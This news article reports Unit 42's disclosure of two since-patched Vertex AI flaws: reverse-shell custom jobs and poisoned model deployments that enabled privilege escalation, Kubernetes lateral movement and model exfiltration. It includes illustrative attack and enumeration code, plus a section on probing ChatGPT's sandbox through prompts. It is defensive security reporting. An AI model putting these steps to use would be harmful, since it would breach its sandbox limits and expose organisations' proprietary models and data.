
Researchers Warn of Privilege Escalation Risks in Google’s Vertex AI ML Platform


Nov 15, 2024 | Ravie Lakshmanan | Artificial Intelligence / Vulnerability

Cybersecurity researchers have disclosed two security flaws in Google’s Vertex machine learning (ML) platform that, if successfully exploited, could allow malicious actors to escalate privileges and exfiltrate models from the cloud.

“By exploiting custom job permissions, we were able to escalate our privileges and gain unauthorized access to all data services in the project,” Palo Alto Networks Unit 42 researchers Ofir Balassiano and Ofir Shaty said in an analysis published earlier this week.

“Deploying a poisoned model in Vertex AI led to the exfiltration of all other fine-tuned models, posing a serious proprietary and sensitive data exfiltration attack risk.”

Vertex AI is Google’s ML platform for training and deploying custom ML models and artificial intelligence (AI) applications at scale. It was first introduced in May 2021.

Crucial to leveraging the privilege escalation flaw is a feature called Vertex AI Pipelines, which allows users to automate and monitor MLOps workflows to train and tune ML models using custom jobs.

Unit 42’s research found that by manipulating the custom job pipeline, it’s possible to escalate privileges to gain access to otherwise restricted resources. This is accomplished by creating a custom job that runs a specially-crafted image designed to launch a reverse shell, granting backdoor access to the environment.
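To make that attack surface concrete, here is a minimal sketch (not Unit 42's actual tooling) of how a custom job with an arbitrary, attacker-supplied container image can be submitted through the Vertex AI Python SDK; the project, region, and image names are hypothetical placeholders.

```python
# Hedged illustration only: all project, region, and image names are made up.
# A custom job runs whatever container image the submitter specifies, so an
# image whose entrypoint opens a reverse shell grants backdoor access to the
# environment the job executes in.
from google.cloud import aiplatform

aiplatform.init(project="victim-project", location="us-central1")

worker_pool_specs = [{
    "machine_spec": {"machine_type": "n1-standard-4"},
    "replica_count": 1,
    "container_spec": {
        # Attacker-controlled image; its entrypoint phones home on startup.
        "image_uri": "us-docker.pkg.dev/attacker-proj/repo/trainer:latest",
    },
}]

job = aiplatform.CustomJob(
    display_name="nightly-finetune",  # looks like a routine training job
    worker_pool_specs=worker_pool_specs,
)
job.run()  # runs under the identity available inside the tenant project
```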

The custom job, per the security vendor, runs in a tenant project under a service agent account with extensive permissions to list all service accounts, manage storage buckets, and access BigQuery tables. Those permissions could in turn be abused to access internal Google Cloud repositories and download images.
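The kind of enumeration those permissions enable can be pictured with a short sketch that calls the standard Google Cloud client libraries under the job container's ambient (Application Default) credentials; the project name is hypothetical and this is illustrative rather than the researchers' actual code.

```python
# Illustrative only: enumerate resources reachable with the credentials the
# custom job container inherits (the tenant project's service agent).
from google.cloud import bigquery, storage

project = "victim-tenant-project"  # hypothetical

# Cloud Storage buckets visible to the service agent.
for bucket in storage.Client(project=project).list_buckets():
    print("bucket:", bucket.name)

# BigQuery datasets and tables in the same project.
bq = bigquery.Client(project=project)
for dataset in bq.list_datasets():
    for table in bq.list_tables(dataset):
        print("table:", table.full_table_id)
```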

The second vulnerability, on the other hand, involves deploying a poisoned model in a tenant project such that it spawns a reverse shell when deployed to an endpoint. The attacker can then abuse the read-only permissions of the "custom-online-prediction" service account to enumerate Kubernetes clusters, fetch their credentials, and run arbitrary kubectl commands.
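A hedged sketch of that enumeration step, using the GKE client library under the "custom-online-prediction" service account's credentials (project name hypothetical), might look like this:

```python
# Illustrative only: list GKE clusters in the tenant project. The response
# includes each cluster's endpoint and CA certificate, which together with the
# service account's OAuth token are enough to build a kubeconfig and issue
# kubectl commands.
from google.cloud import container_v1

project = "victim-tenant-project"  # hypothetical
client = container_v1.ClusterManagerClient()

response = client.list_clusters(parent=f"projects/{project}/locations/-")
for cluster in response.clusters:
    print(cluster.name, cluster.endpoint)
```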

“This step enabled us to move from the GCP realm into Kubernetes,” the researchers said. “This lateral movement was possible because permissions between GCP and GKE were linked through IAM Workload Identity Federation.”

The analysis further found that this access can be used to view newly created images within the Kubernetes cluster and obtain their image digests, which uniquely identify container images. Those digests can then be used to extract the images outside of the container with crictl, using the authentication token associated with the "custom-online-prediction" service account.

On top of that, the malicious model could also be weaponized to view and export all large language models (LLMs) and their fine-tuned adapters in a similar fashion.

This could have severe consequences if a developer unknowingly deploys a trojanized model uploaded to a public repository, allowing the threat actor to exfiltrate all of the project's proprietary ML models and fine-tuned LLMs. Following responsible disclosure, both shortcomings have since been addressed by Google.

“This research highlights how a single malicious model deployment could compromise an entire AI environment,” the researchers said. “An attacker could use even one unverified model deployed on a production system to exfiltrate sensitive data, leading to severe model exfiltration attacks.”

Organizations are advised to implement strict controls on model deployments and to audit the permissions required to deploy a model in tenant projects.
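As a starting point for such an audit, a short script can inventory every endpoint and deployed model in a project so that unexpected deployments stand out; the project and region below are hypothetical and the sketch is illustrative, not an official hardening procedure.

```python
# Illustrative audit sketch: list all Vertex AI endpoints and the models
# deployed to them, including the service account each deployment runs as.
from google.cloud import aiplatform

aiplatform.init(project="my-ml-project", location="us-central1")

for endpoint in aiplatform.Endpoint.list():
    for deployed in endpoint.list_models():
        print(
            f"endpoint={endpoint.display_name} "
            f"model={deployed.model} "
            f"service_account={deployed.service_account}"
        )
```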

The development comes as Mozilla’s 0Day Investigative Network (0Din) revealed that it’s possible to interact with OpenAI ChatGPT’s underlying sandbox environment (“/home/sandbox/.openai_internal/”) via prompts, granting the ability to upload and execute Python scripts, move files, and even download the LLM’s playbook.

That said, it’s worth noting that OpenAI considers such interactions intentional or expected behavior, given that the code execution takes place within the confines of the sandbox and is unlikely to spill out of it.

“For anyone eager to explore OpenAI’s ChatGPT sandbox, it’s crucial to understand that most activities within this containerized environment are intended features rather than security gaps,” security researcher Marco Figueroa said.

“Extracting knowledge, uploading files, running bash commands or executing python code within the sandbox are all fair game, as long as they don’t cross the invisible lines of the container.”

